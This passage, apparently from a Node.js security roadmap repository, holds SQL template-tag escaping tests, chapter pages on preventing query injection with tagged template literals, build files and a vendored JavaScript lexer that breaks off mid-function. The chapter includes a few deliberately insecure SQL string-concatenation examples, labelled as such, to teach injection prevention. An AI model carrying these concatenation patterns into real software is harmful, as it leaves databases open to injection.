73 | expect(tokens('SELECT `"', '`')).to.equal('`,_')
74 | expect(tokens('SELECT ```', '`')).to.equal('`,_')
75 | expect(tokens('SELECT `\\`', '`')).to.equal('`,_')
76 | })
77 | })
78 |
79 | function runTagTest (golden, test) {
80 | // Run the test three times (i = 2, 1, 0) to catch memoization bugs.
81 | for (let i = 3; --i >= 0;) {
82 | let result = test()
83 | if (result instanceof index.SqlFragment) {
84 | result = result.toString()
85 | } else {
86 | throw new Error(`Expected SqlFragment not ${result}`) // any other result type fails the test outright
87 | }
88 | expect(result).to.equal(golden)
89 | }
90 | }
91 |
92 | describe('sql', () => {
93 | it('numbers', () => {
94 | runTagTest(
95 | 'SELECT 2',
96 | () => index.sql`SELECT ${1 + 1}`)
97 | })
98 | it('date', () => {
99 | runTagTest(
100 | `SELECT '2000-01-01 00:00:00.000'`,
101 | () => index.sql`SELECT ${new Date(Date.UTC(2000, 0, 1, 0, 0, 0))}`)
102 | })
103 | it('string', () => {
104 | runTagTest(
105 | `SELECT 'Hello, World!\\n'`,
106 | () => index.sql`SELECT ${'Hello, World!\n'}`)
107 | })
108 | it('identifier', () => {
109 | runTagTest(
110 | 'SELECT `foo`',
111 | () => index.sql`SELECT ${new index.Identifier('foo')}`)
112 | })
113 | it('fragment', () => {
114 | const fragment = new index.SqlFragment('1 + 1')
115 | runTagTest(
116 | `SELECT 1 + 1`,
117 | () => index.sql`SELECT ${fragment}`)
118 | })
119 | it('fragment no token merging', () => {
120 | const fragment = new index.SqlFragment('1 + 1')
121 | runTagTest(
122 | `SELECT 1 + 1 FROM T`,
123 | () => index.sql`SELECT${fragment}FROM T`)
124 | })
125 | it('string in dq string', () => {
126 | runTagTest(
127 | `SELECT "Hello, World!\\n"`,
128 | () => index.sql`SELECT "Hello, ${'World!'}\n"`)
129 | })
130 | it('string in sq string', () => {
131 | runTagTest(
132 | `SELECT 'Hello, World!\\n'`,
133 | () => index.sql`SELECT 'Hello, ${'World!'}\n'`)
134 | })
135 | it('string after string in string', () => {
136 | // The following tests check obliquely that '?' is not
137 | // interpreted as a prepared statement meta-character
138 | // internally.
139 | runTagTest(
140 | `SELECT 'Hello', "World?"`,
141 | () => index.sql`SELECT '${'Hello'}', "World?"`)
142 | })
143 | it('string before string in string', () => {
144 | runTagTest(
145 | `SELECT 'Hello?', 'World?'`,
146 | () => index.sql`SELECT 'Hello?', '${'World?'}'`)
147 | })
148 | it('number after string in string', () => {
149 | runTagTest(
150 | `SELECT 'Hello?', 123`,
151 | () => index.sql`SELECT '${'Hello?'}', ${123}`)
152 | })
153 | it('number before string in string', () => {
154 | runTagTest(
155 | `SELECT 123, 'World?'`,
156 | () => index.sql`SELECT ${123}, '${'World?'}'`)
157 | })
158 | it('string in identifier', () => {
159 | runTagTest(
160 | 'SELECT `foo`',
161 | () => index.sql`SELECT \`${'foo'}\``)
162 | })
163 | it('number in identifier', () => {
164 | runTagTest(
165 | 'SELECT `foo_123`',
166 | () => index.sql`SELECT \`foo_${123}\``)
167 | })
168 | it('array', () => {
169 | const id = new index.Identifier('foo')
170 | const frag = new index.SqlFragment('1 + 1')
171 | const values = [ 123, 'foo', id, frag ]
172 | runTagTest(
173 | "SELECT X FROM T WHERE X IN (123, 'foo', `foo`, 1 + 1)",
174 | () => index.sql`SELECT X FROM T WHERE X IN (${values})`)
175 | })
176 | })
177 | })
178 |
--------------------------------------------------------------------------------
/chapter-7/libraries.md:
--------------------------------------------------------------------------------
1 | # Library support for Safe Coding Practices
2 |
3 | The way we structure libraries and APIs affects the idioms that are
4 | available to developers.
5 |
6 | If the easiest ways to express ideas are also secure against a
7 | particular class of attack, then developers who have seen ideas
8 | expressed those ways will tend to produce code that is secure
9 | against that class of attack.
10 |
11 | Next, we introduce a few such idioms, show how they can be better
12 | addressed via a rarely used but powerful JavaScript
13 | feature, and end with some ideas on how to foster consistent,
14 | powerful, and secure APIs for a class of problems that often have
15 | security consequences: composing structured strings to send to
16 | external agents.
17 |
--------------------------------------------------------------------------------
/chapter-7/query-langs.md:
--------------------------------------------------------------------------------
1 | # Query injection
2 |
3 | Threats: [QUI][]
4 |
5 | One piece of simple advice to avoid [query injection attacks][QUI] is
6 | "just use [prepared statements][]."
7 |
8 | This is good advice, and the [`mysql`][] library has a
9 | solid, well-documented API for producing secure prepared statements.
10 |
11 | Developers could do
12 |
13 | ```js
14 | const mysql = require('mysql');
15 | ...
16 | connection.query(
17 | 'SELECT * FROM T WHERE x = ?, y = ?, z = ?',
18 | [ x, y, z],
19 | callback);
20 | ```
21 |
22 | which is secure since `.query` calls `mysql.format` under the hood
23 | to escape `x`, `y`, and `z`. Enough developers still do
24 |
25 | ```js
26 | connection.query(
27 | "SELECT * FROM T WHERE x = '" + x + "', y = '" + y + "', z='" + z + "'",
28 | callback);
29 | ```
30 |
31 | to make query injection a real problem.
32 |
33 |
34 | Developers may not know about prepared statements, but prepared
35 | statements have other problems:
36 |
37 | * They rely on a **correspondence between positional parameters**
38 | and the '`?`' placeholders that they fill. When a prepared statement
39 | has more substitutions than fit in a reader's working memory, they
40 | have to look back and forth between the prepared statement, and the
41 | parameter list.
42 | * Prepared statements do not make it easy to **compose a query** from
43 | simpler query fragments. It's not easy to compute the `WHERE`
44 | clause separately from the result column set and then combine the
45 | two into a query without resorting to string concatenation
46 | somewhere along the line.
47 |
48 |
49 | ## Template literals
50 |
51 | JavaScript has a rarely used feature that lets us get the best of
52 | both worlds.
53 |
54 |
55 | ```js
56 | connection.query`SELECT * FROM T WHERE x = ${x}, y = ${y}, z = ${z}`(callback)
57 | ```
58 |
59 | uses a [tagged template literal][] to allow inline expressions in SQL
60 | syntax.
61 |
62 | > A more advanced form of template literals are tagged template
63 | > literals. Tags allow you to parse template literals with a
64 | > function. The first argument of a tag function contains an array of
65 | > string values. The remaining arguments are related to the
66 | > expressions. In the end, your function can return your manipulated
67 | > string (or it can return something completely different ...).
68 |
69 | The code above is almost equivalent to
70 |
71 | ```js
72 | connection.query(
73 | ['SELECT * FROM T WHERE x = ', ', y = ', ', z = ', ''],
74 | x, y, z
75 | )(callback);
76 | ```
77 |
78 | `connection.query` gets called with the parts of the static
79 | template string specified by the author, followed by the results of
80 | the expressions. The final `(callback)` dispatches the query.
81 |
82 | We can tweak SQL APIs so that, when used as template literal tags,
83 | they escape the dynamic parts to preserve the intent of the author of
84 | the static parts, and then re-interleave them to produce the query.
85 |
86 | The example ([code][sql-code]) accompanying this chapter implements
87 | this idea by defining a `mysql.sql` function that parses the static
88 | parts to choose appropriate escapers for the dynamic parts.
89 | We have put together a [draft PR][mysql-PR] to integrate this into
90 | the *mysql* module.
91 |
92 | It also provides string wrappers, `Identifier` and `SqlFragment`, to
93 | make it easy to compose complex queries from simpler parts:
94 |
95 | ```js
96 | // Compose a query from two fragments.
97 | // When the value inside ${...} is a SqlFragment, no extra escaping happens.
98 | connection.query`
99 | SELECT ${outputColumnsAndJoins(a, b, c)}
100 | WHERE ${rowFilter(x, y, z)}
101 | `(callback)
102 |
103 | // Returns a SqlFragment
104 | function rowFilter(x, y, z) {
105 | if (complexCondition) {
106 | // mysql.sql returns a SqlFragment
107 | return mysql.sql`X = ${x}`;
108 | } else {
109 | return mysql.sql`Y = ${y} AND Z=${z}`;
110 | }
111 | }
112 |
113 | function outputColumnsAndJoins(a, b, c) {
114 | return mysql.sql`...`;
115 | }
116 | ```
117 |
118 | ----
119 |
120 | Our goal was to make the easiest way to express an idea a secure way.
121 |
122 | As shown below, this template tag API is the shortest way to express
123 | this idea. It is also tolerant of small variations
124 | — the author may leave out quotes since the tag implementation
125 | knows whether a substitution is inside quotes.
126 |
127 | Shorter & tolerant != easier, but we hope that being shorter, more
128 | robust, more secure, and easy to compose will make it a good migration
129 | target for teams that realize they have a problem with SQL injection.
130 | We also hope these factors will cause developers who have been through
131 | such a migration to continue to use it in subsequent projects where it
132 | may spread to other developers.
133 |
134 |
135 | ```js
136 | // Proposed: Secure, tolerant, composes well.
137 | connection.query`SELECT * FROM T WHERE x=${x}`(callback)
138 | connection.query`SELECT * FROM T WHERE x="${x}"`(callback)
139 |
140 | // String concatenation. Insecure, composes well.
141 | connection.query('SELECT * FROM T WHERE x = "' + x + '"', callback)
142 | connection.query(`SELECT * FROM T WHERE x = "${x}"`, callback)
143 |
144 | // String concatenation is not tolerant.
145 | // Broken in a way that will be caught during casual testing.
146 | connection.query('SELECT * FROM T WHERE x = ' + x, callback)
147 | connection.query(`SELECT * FROM T WHERE x = ${x}`, callback)
148 |
149 | // Prepared Statements. Secure, composes badly, positional parameters.
150 | connection.query('SELECT * FROM T WHERE x = ?', x, callback)
151 | connection.query('SELECT * FROM T WHERE x = "?"', x, callback) // Subtly broken
152 | ```
153 |
154 |
155 |
156 | [`mysql`]: https://www.npmjs.com/package/mysql
157 | [QUI]: ../chapter-1/threat-QUI.md
158 | [prepared statements]: https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet#Defense_Option_1:_Prepared_Statements_.28with_Parameterized_Queries.29
159 | [tagged template literal]: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Template_literals#Tagged_template_literals
160 | [sql-code]: https://github.com/google/node-sec-roadmap/tree/master/chapter-7/examples/sql
161 | [mysql-PR]: https://github.com/mysqljs/mysql/pull/1926
162 |
--------------------------------------------------------------------------------
/chapter-7/structured-strings.md:
--------------------------------------------------------------------------------
1 | # Structured Strings
2 |
3 | Both of the previously discussed problems, query injection and shell
4 | injection, are facets of a common problem: it is hard to securely
5 | compose strings to send outside the process. In the first case,
6 | we send a query string to a database via a file descriptor bound to a
7 | network socket or an IPC endpoint. In the second, we send a string
8 | via a syscall wrapper, to spawn a child process.
9 |
10 | ## Success Criteria
11 |
12 | We can securely compose strings for external endpoints if:
13 |
14 | * Developers routinely use tools to produce structured strings
15 | that preserve developers' intent even in the face of inputs
16 | crafted by a skilled attacker, and/or
17 | * Where developers do not, the backends grant no authority based on
18 | the structure of the string, and the authority granted ambiently is
19 | so small as to not be abusable.
20 |
21 | Nailing down the definition of *intent* is hard, but here's an example
22 | of how we can in one context. Consider
23 |
24 | ```js
25 | "SELECT * FROM T WHERE id=" + f(accountNumber)
26 | ```
27 |
28 | A reasonable reader would conclude that the author intended:
29 |
30 | * That the result specifies one statement, a select statement.
31 | * That `f(accountNumber)` specifies only a simple value that
32 | can be compared to values in the *id* column.
33 |
34 | Given that, we can say `function f(x)` preserves intent in that code
35 | if, for any value of `accountNumber`, it throws an exception or
36 | its output following "`SELECT * FROM T WHERE id=`" parses as a
37 | single number or string literal token.
38 |
39 |
40 |
41 | ## A possible solution
42 |
43 | ### Change the world so we can give simple answers to hard questions.
44 |
45 | Extend existing APIs so that whenever a developer is composing a
46 | string to send outside the `node` process, they have a template
47 | literal tag based API that is more secure than string concatenation.
48 |
49 | Then, we can give developers a simple piece of advice:
50 |
51 | > If you're composing a string that will end up outside node, use
52 | > a template tag.
53 |
54 | Template tags will have implementation bugs, but fixing one template
55 | tag is easier than fixing many expressions of the form
56 | `("foo " + bar + " baz")`.
57 |
58 |
59 | ### A common style guide for tag implementers.
60 |
61 | It would help developers if these template literal tags had some
62 | consistency across libraries. We've already briefly discussed ways to
63 | make template tags more discoverable and usable when talking about
64 | ways to treat [generated code][synthetic modules] as first class.
65 |
66 | We propose a style guide for tag authors.
67 | Others will probably have better ideas as to what it should contain, but
68 | to get a discussion started:
69 |
70 | - Functions that compose or represent a string whose recipient is outside
71 | the node runtime should accept template tags.
72 | Examples include `mysql.format` which composes a string of SQL.
73 | - These functions should return a typed string wrapper.
74 | For example, if the output is a string of *SQL* tokens,
75 | then return an instance of:
76 | ```js
77 | function SqlFragment(s) {
78 | if (!(this instanceof SqlFragment)) { return new SqlFragment(s); }
79 | this.content = String(s);
80 | }
81 | SqlFragment.prototype.toString = function () { return this.content; };
82 | ```
83 | Don't re-escape `SqlFragment`s received as interpolation values
84 | where they make sense.
85 | - See if you can reuse string wrappers from a library before rolling
86 | your own to encourage interoperability.
87 | If a library defines a type representing a fragment of HTML, use that
88 | as long as your operator can uphold the type's contract.
89 | For example if the type has a particular [security contract][],
90 | make sure that you preserve that security contract.
91 | You may assume that wrapped strings come from a source that upheld
92 | the contract.
93 | Producing a value that doesn't uphold its contract when your inputs do
94 | is a bug, but assuming incorrectly that type contracts hold for your
95 | inputs is not.
96 | If you can double check inputs, great!
97 | - The canonical way to test whether a function was (very probably)
98 | called as a template tag is
99 | ```js
100 | function (a, ...b) {
101 | if (Array.isArray(a) && Array.isArray(a.raw)
102 | && Object.isFrozen(a)
103 | && a.length === b.length + 1) {
104 | // Treat as template tag.
105 | }
106 | // Handle non template tag use.
107 | }
108 | ```
109 | - When a template tag takes options objects, it should
110 | be possible to curry those before invoking the function as a tag.
111 | The following passes some environment variables and a working directory
112 | before the command:
113 | ```js
114 | shelljs.exec({ env: ..., cwd: ... })`cat ...`
115 | ```
116 | - When a template tag takes a `callback`, the template tag should
117 | return a function that will receive the callback.
118 | The following uses a template tag that returns a function that
119 | takes a callback:
120 | ```js
121 | myConnection.query`SELECT ...`(callback)
122 | ```
123 | - Where possible, allow indenting multi-line template tags.
124 | Use the first line with non-whitespace characters as a cue
125 | when stripping whitespace from the rest of the lines.
126 |
127 | ## Alternatives
128 |
129 | Database abstractions like object-relational mappings are a great way
130 | to get developers out of the messy business of composing queries.
131 |
132 | There are still niche use cases like ad-hoc reporting that require
133 | composing queries, and solving the problem for database queries does
134 | not solve it for strings sent elsewhere, e.g. shells.
135 |
136 | Builder APIs provide a flexible way to compose structured content.
137 | For example,
138 |
139 | ```java
140 | new QueryBuilder()
141 | .select()
142 | .innerJoin(...).on(...)
143 | .columns(...)
144 | .where(...)
145 | .orderBy(...)
146 | .build()
147 | ```
148 |
149 | The explicit method calls specify the structure of the resulting
150 | string, so controlling parameters doesn't grant control of sentence
151 | structure, and control of one parameter doesn't allow reinterpreting
152 | part of the query specified by an uncontrolled parameter.
153 |
154 | In JavaScript we prefer tagged templates to builders. Builder APIs can
155 | be syntactically heavy and developers have to discover and learn them.
156 | We hope that adoption of template tags will be easier because:
157 |
158 | * Tagged templates are syntactically lighter so easier to write.
159 | * Someone unfamiliar with the API, but familiar with the query language, will
160 | have to do less work to leverage the one to understand the other making
161 | tagged templates easier to read and adapt for one's own work.
162 | * Builder APIs have to treat nested sub-languages (e.g. URLs in HTML)
163 | as strings unless there is a builder API for the sub-language.
164 |
165 |
166 | [security contract]: https://github.com/google/safe-html-types
167 | [synthetic modules]: ../chapter-2/synthetic-modules.html
168 |
--------------------------------------------------------------------------------
/cover.md:
--------------------------------------------------------------------------------
1 | # A Roadmap for Node.js Security
2 |
3 | Node.js has a vibrant community of application developers and library
4 | authors built around a mature and well-maintained core runtime and
5 | library set. Its growing popularity is already drawing more attention
6 | from attackers. This roadmap discusses how some Node.js projects
7 | address security challenges, along with ways to make it easier
8 | for more projects to address these challenges in a thorough and
9 | consistent manner.
10 |
11 | This is not the opinion of any organization. It is the considered
12 | opinion of
13 | [some computer security professionals and Node.js enthusiasts][contributors]
14 | who have worked to make it easier to write secure, robust software on
15 | other platforms; who like a lot about Node.js; and who would like to
16 | help make it better.
17 |
18 | Our intended audience is Node.js library and infrastructure
19 | maintainers who want to stay ahead of the increased scrutiny that
20 | Node.js is getting from attackers. We have not researched whether,
21 | and do not assert that, any stack is inherently more or less secure
22 | than any other.
23 |
24 | Node.js security is especially important for “primary targets”.
25 | Targets are often subdivided into "primary targets" and "targets of
26 | opportunity." One attacks the latter if one happens to see a
27 | vulnerability. One goes out of their way to find vulnerabilities in
28 | the former. The practices which prevent one from becoming a target of
29 | opportunity might not be enough if one is a primary target of an actor
30 | with resources at their disposal. We hope that the ideas we present
31 | might help primary targets to defeat attacks while making targets of
32 | opportunity rarer and the entire ecosystem more secure.
33 |
34 | When addressing threats, we want to make sure we preserve Node.js's
35 | strengths.
36 |
37 | * Development teams can iterate quickly allowing them to explore a
38 | large portion of the design space.
39 | * Developers can use a wealth of publicly available packages to solve
40 | everyday problems.
41 | * Anyone who identifies a shared problem can write and publish a
42 | module to solve it, or send a pull request with a fix or extension
43 | to an existing project.
44 | * Node.js integrates with a wide variety of application containers so
45 | project teams have options when deciding how to deploy.
46 | * Using JavaScript on the front and back ends of Web applications
47 | allows developers to work both sides when need be.
48 |
49 | The individual chapters are largely independent of one another:
50 |
51 | "[Threat environment][]" discusses the kinds of threats that concern us.
52 |
53 | "[Dynamism when you need it][]" discusses how to preserve the power of
54 | CommonJS module linking, `vm` contexts, and runtime code generation
55 | while making sure that, in production, only code that the development
56 | team trusts gets run.
57 |
58 | "[Knowing your dependencies][]" discusses ways to help development
59 | teams make informed decisions about third-party dependencies.
60 |
61 | "[Keeping your dependencies close][]" discusses how keeping a local
62 | replica of portions of the larger npm repository affects security and
63 | aids incident response.
64 |
65 | "[Oversight][]" discusses how code-quality tools can help decouple
66 | security review from development.
67 |
68 | "[When all else fails][]" discusses how the development →
69 | production pipeline and development practices can affect the ability
70 | of security professionals to identify and respond to imminent threats.
71 |
72 | "[Library support for safe coding practices][]" discusses idioms
73 | that, if more widespread, might make it easier for developers to
74 | produce secure, robust systems.
75 |
76 | You can browse the supporting code via *[github.com/google/node-sec-roadmap/][]*.
77 |
78 | [contributors]: CONTRIBUTORS.md
79 | [Threat environment]: chapter-1/threats.md
80 | [Dynamism when you need it]: chapter-2/dynamism.md
81 | [Knowing your dependencies]: chapter-3/knowing_dependencies.md
82 | [Keeping your dependencies close]: chapter-4/close_dependencies.md
83 | [Oversight]: chapter-5/oversight.md
84 | [When all else fails]: chapter-6/failing.md
85 | [Library support for safe coding practices]: chapter-7/libraries.md
86 | [github.com/google/node-sec-roadmap/]: https://github.com/google/node-sec-roadmap/
87 |
--------------------------------------------------------------------------------
/images/FileExternal.svg:
--------------------------------------------------------------------------------
1 |
2 |
6 |
10 |
--------------------------------------------------------------------------------
/images/GitHub-Mark-32px.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/google/node-sec-roadmap/8e01b94ee2a7bbae9c9f758131fd421e2a1c8aa6/images/GitHub-Mark-32px.png
--------------------------------------------------------------------------------
/images/ic_print_24dp.svg:
--------------------------------------------------------------------------------
1 |
5 |
--------------------------------------------------------------------------------
/images/npmjs-node.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/google/node-sec-roadmap/8e01b94ee2a7bbae9c9f758131fd421e2a1c8aa6/images/npmjs-node.png
--------------------------------------------------------------------------------
/license.md:
--------------------------------------------------------------------------------
1 |
3 |
4 |
5 | A Roadmap for Node.js Security by https://github.com/google/node-sec-roadmap/ is licensed under a Creative Commons Attribution 4.0 International License.
6 |
--------------------------------------------------------------------------------
/package.json:
--------------------------------------------------------------------------------
1 | {
2 | "version": "1.0.0",
3 | "name": "@mikesamuel/nodejs_sec_book",
4 | "description": "Booklet about NodeJS in organizations with large security profiles",
5 | "homepage": "https://github.com/google/node-sec-roadmap/",
6 | "license": "(Apache License 2.0 OR CC-BY-4.0)",
7 | "author": {
8 | "name": "Mike Samuel",
9 | "email": "mikesamuel@gmail.com",
10 | "url": "https://github.com/mikesamuel"
11 | },
12 | "files": [
13 | "www/**"
14 | ],
15 | "main": "www/index.html",
16 | "dependencies": {
17 | "gitbook": ">=3.2.3",
18 | "gitbook-cli": ">=2.3.2",
19 | "gitbook-plugin-ga": "^1.0.1",
20 | "gitbook-plugin-links": "^3.0.1",
21 | "svgexport": "^0.3.2"
22 | },
23 | "private": true,
24 | "scripts": {
25 | "start": "make serve"
26 | }
27 | }
28 |
--------------------------------------------------------------------------------
/styles/website.css:
--------------------------------------------------------------------------------
1 | /**
2 | * @license
3 | * Copyright 2017 Google LLC
4 | *
5 | * Licensed under the Apache License, Version 2.0 (the "License");
6 | * you may not use this file except in compliance with the License.
7 | * You may obtain a copy of the License at
8 | *
9 | * https://www.apache.org/licenses/LICENSE-2.0
10 | *
11 | * Unless required by applicable law or agreed to in writing, software
12 | * distributed under the License is distributed on an "AS IS" BASIS,
13 | * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
14 | * See the License for the specific language governing permissions and
15 | * limitations under the License.
16 | */
17 |
18 | .print-button.btn.links-link {
19 | display: inline-block;
20 | width: 30px;
21 | font-size: 0;
22 | background-image: url("/images/ic_print_24dp.svg");
23 | background-repeat: no-repeat;
24 | background-position: center center;
25 | }
26 |
27 | .github-button.btn.links-link {
28 | display: inline-block;
29 | width: 30px;
30 | font-size: 0;
31 | background-image: url("/images/GitHub-Mark-32px.png");
32 | background-repeat: no-repeat;
33 | background-position: center center;
34 | background-size: 20px;
35 | opacity: 0.25;
36 | }
37 |
38 | /* Style external links */
39 | a[href^="http://"]:not([href^="http://www.gitbook.com"]),
40 | a[href^="https://"]:not([href^="https://www.gitbook.com"]),
41 | a[href^="//"]:not([href^="//www.gitbook.com"]) {
42 | background-image: url("/images/FileExternal.svg");
43 | background-position: center right;
44 | background-repeat: no-repeat;
45 | background-size: 12px 12px;
46 | padding-right: 14px;
47 | }
48 |
--------------------------------------------------------------------------------
/third_party/__init__.py:
--------------------------------------------------------------------------------
1 | # Copyright 2017 Google LLC
2 | #
3 | # Licensed under the Apache License, Version 2.0 (the "License");
4 | # you may not use this file except in compliance with the License.
5 | # You may obtain a copy of the License at
6 | #
7 | # https://www.apache.org/licenses/LICENSE-2.0
8 | #
9 | # Unless required by applicable law or agreed to in writing, software
10 | # distributed under the License is distributed on an "AS IS" BASIS,
11 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | # See the License for the specific language governing permissions and
13 | # limitations under the License.
14 |
--------------------------------------------------------------------------------
/third_party/jslex/__init__.py:
--------------------------------------------------------------------------------
1 | # Copyright 2017 Google LLC
2 | #
3 | # Licensed under the Apache License, Version 2.0 (the "License");
4 | # you may not use this file except in compliance with the License.
5 | # You may obtain a copy of the License at
6 | #
7 | # https://www.apache.org/licenses/LICENSE-2.0
8 | #
9 | # Unless required by applicable law or agreed to in writing, software
10 | # distributed under the License is distributed on an "AS IS" BASIS,
11 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | # See the License for the specific language governing permissions and
13 | # limitations under the License.
14 |
--------------------------------------------------------------------------------
/third_party/jslex/jslex.py:
--------------------------------------------------------------------------------
1 | # Copyright 2011-2015 Ned Batchelder. All rights reserved.
2 | #
3 | # Except where noted otherwise, this software is licensed under the Apache
4 | # License, Version 2.0 (the "License"); you may not use this work except in
5 | # compliance with the License. You may obtain a copy of the License at
6 | #
7 | # http://www.apache.org/licenses/LICENSE-2.0
8 | #
9 | # Unless required by applicable law or agreed to in writing, software
10 | # distributed under the License is distributed on an "AS IS" BASIS,
11 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | # See the License for the specific language governing permissions and
13 | # limitations under the License.
14 |
15 | # From https://bitbucket.org/ned/jslex/raw/a1ee4078977a3ef9c4682837c669637c04c417af/jslex.py
16 | # For details: https://bitbucket.org/ned/jslex/src/default/NOTICE.txt
17 |
18 |
19 | """JsLex: a lexer for Javascript"""
20 |
21 | import re
22 |
class Tok(object):
    """Describes one kind of token that a lexer can recognise.

    Every instance receives a unique ``id`` taken from the class-wide
    counter ``Tok.num``, which is incremented on each construction.
    """

    # Class-wide counter; its current value becomes the id of the next Tok.
    num = 0

    def __init__(self, name, regex, next=None):
        """Record the token's label, pattern and follow-up state.

        `name` is the label stored for this token kind, `regex` is the
        pattern source text, and `next` is an optional value stored as the
        state to move to after this token (``None`` by default).
        """
        # Claim the current counter value, then bump it for the next instance.
        self.id, Tok.num = Tok.num, Tok.num + 1
        self.name, self.regex, self.next = name, regex, next
34 |
def literals(choices, prefix="", suffix=""):
    """Build a regex alternation from whitespace-separated literal `choices`.

    `choices` is split on whitespace. Each piece is regex-escaped, wrapped
    individually in `prefix` and `suffix`, and the pieces are joined with
    ``|`` in their original order.

    """
    alternatives = []
    for literal in choices.split():
        alternatives.append(prefix + re.escape(literal) + suffix)
    return "|".join(alternatives)
43 |
class Lexer(object):
    """A generic multi-state regex-based lexer.

    Each state owns one compiled regex that is the alternation of all of
    that state's token patterns, each wrapped in a named group ``t<id>``.
    A matched token may name the state to switch to via its ``next``
    attribute.
    """

    def __init__(self, states, first):
        """Compile one regex per state.

        `states` maps a state name to an ordered list of token specs
        (objects with ``id``, ``name``, ``regex`` and ``next`` attributes).
        Order matters: earlier alternatives win.  `first` is the initial
        state.
        """
        self.regexes = {}
        self.toks = {}

        for state, rules in states.items():
            parts = []
            for tok in rules:
                groupid = "t%d" % tok.id
                self.toks[groupid] = tok
                parts.append("(?P<%s>%s)" % (groupid, tok.regex))
            self.regexes[state] = re.compile(
                "|".join(parts), re.MULTILINE | re.VERBOSE)

        self.state = first

    def lex(self, text):
        """Lexically analyze `text`.

        Yields pairs (`name`, `tokentext`).

        Text that no rule of the current state matches is skipped, as
        ``finditer`` does.  The final state is stored on ``self.state`` once
        the generator has been exhausted, so a later call continues in that
        state.

        """
        end = len(text)
        state = self.state
        regexes = self.regexes
        toks = self.toks
        start = 0

        while start < end:
            for match in regexes[state].finditer(text, start):
                name = match.lastgroup
                tok = toks[name]
                toktext = match.group(name)
                # Resume from where this match really ended.  Adding
                # len(toktext) would drift whenever finditer skipped
                # unmatched characters before the match.
                start = match.end()
                yield (tok.name, toktext)

                if tok.next:
                    # Switch state and rescan with that state's regex.
                    state = tok.next
                    break
            else:
                # The iterator ran dry without a state switch: nothing more
                # can match in this state, so stop instead of rescanning
                # (which could duplicate tokens or loop forever).
                break

        self.state = state
86 |
87 |
class JsLexer(Lexer):
    """A Javascript lexer

    >>> lexer = JsLexer()
    >>> list(lexer.lex("a = 1"))
    [('id', 'a'), ('ws', ' '), ('punct', '='), ('ws', ' '), ('dnum', '1')]

    The lexer has two states that differ only in how a slash is read:
    in 'div' it is a division operator, in 'reg' it opens a regex literal.
    Each token's `next` selects the state that applies after it.

    This doesn't properly handle non-ASCII characters in the Javascript source.

    """

    # Because these tokens are matched as alternatives in a regex, longer possibilities
    # must appear in the list before shorter ones, for example, '>>' before '>'.
    #
    # Note that we don't have to detect malformed Javascript, only properly lex
    # correct Javascript, so much of this is simplified.

    # Details of Javascript lexical structure are taken from
    # http://www.ecma-international.org/publications/files/ECMA-ST/ECMA-262.pdf

    # A useful explanation of automatic semicolon insertion is at
    # http://inimino.org/~inimino/blog/javascript_semicolons

    both_before = [
        Tok("comment", r"/\*(.|\n)*?\*/"),
        Tok("linecomment", r"//.*?$"),
        Tok("ws", r"\s+"),
        Tok("keyword", literals("""
            break case catch class const continue debugger
            default delete do else enum export extends
            finally for function if import in instanceof new
            return super switch this throw try typeof var
            void while with
            """, suffix=r"\b"), next='reg'),
        Tok("reserved", literals("null true false", suffix=r"\b"), next='div'),
        # Unicode escapes take exactly four hex digits (a-f / A-F).
        Tok("id", r"""
            ([a-zA-Z_$]|\\u[0-9a-fA-F]{4})      # first char
            ([a-zA-Z_$0-9]|\\u[0-9a-fA-F]{4})*  # rest chars
            """, next='div'),
        Tok("hnum", r"0[xX][0-9a-fA-F]+", next='div'),
        # Like every other numeric literal, an octal literal is an operand,
        # so a following slash must be read as division.
        Tok("onum", r"0[0-7]+", next='div'),
        Tok("dnum", r"""
            (   (0|[1-9][0-9]*)     # DecimalIntegerLiteral
                \.                  # dot
                [0-9]*              # DecimalDigits-opt
                ([eE][-+]?[0-9]+)?  # ExponentPart-opt
            |
                \.                  # dot
                [0-9]+              # DecimalDigits
                ([eE][-+]?[0-9]+)?  # ExponentPart-opt
            |
                (0|[1-9][0-9]*)     # DecimalIntegerLiteral
                ([eE][-+]?[0-9]+)?  # ExponentPart-opt
            )
            """, next='div'),
        Tok("punct", literals("""
            >>>= === !== >>> <<= >>= <= >= == != << >> &&
            || += -= *= %= &= |= ^=
            """), next="reg"),
        Tok("punct", literals("++ -- ) ]"), next='div'),
        Tok("punct", literals("{ } ( [ . ; , < > + - * % & | ^ ! ~ ? : ="), next='reg'),
        Tok("string", r'"([^"\\]|(\\(.|\n)))*?"', next='div'),
        Tok("string", r"'([^'\\]|(\\(.|\n)))*?'", next='div'),
    ]

    # Catch-all so that every character is consumed by some token.
    both_after = [
        Tok("other", r"."),
    ]

    states = {
        'div':  # slash will mean division
            both_before + [
                Tok("punct", literals("/= /"), next='reg'),
            ] + both_after,

        'reg':  # slash will mean regex
            both_before + [
                Tok("regex",
                    r"""
                    /                       # opening slash
                    # First character is..
                    (   [^*\\/[]            # anything but * \ / or [
                    |   \\.                 # or an escape sequence
                    |   \[                  # or a class, which has
                            (   [^\]\\]     #   anything but \ or ]
                            |   \\.         #   or an escape sequence
                            )*              #   many times
                        \]
                    )
                    # Following characters are same, except for excluding a star
                    (   [^\\/[]             # anything but \ / or [
                    |   \\.                 # or an escape sequence
                    |   \[                  # or a class, which has
                            (   [^\]\\]     #   anything but \ or ]
                            |   \\.         #   or an escape sequence
                            )*              #   many times
                        \]
                    )*                      # many times
                    /                       # closing slash
                    [a-zA-Z0-9]*            # trailing flags
                    """, next='div'),
            ] + both_after,
    }

    def __init__(self):
        """Start in the 'reg' state: at the start of input a slash opens a regex."""
        super(JsLexer, self).__init__(self.states, 'reg')
194 |
195 |
def js_to_c_for_gettext(js):
    """Rewrite the Javascript source `js` as C-like text for xgettext.

    The source is tokenized with JsLexer and re-joined with three changes:
    regex literals become the string "REGEX", single-quoted strings are
    re-quoted with double quotes, and backslashes inside identifiers are
    replaced by "U".  Every other token passes through untouched.

    """
    def requote(match):
        """Backslash-escape a bare double quote; keep any other piece as is."""
        piece = match.group(0)
        return r'\"' if piece == '"' else piece

    pieces = []
    for kind, text in JsLexer().lex(js):
        if kind == 'regex':
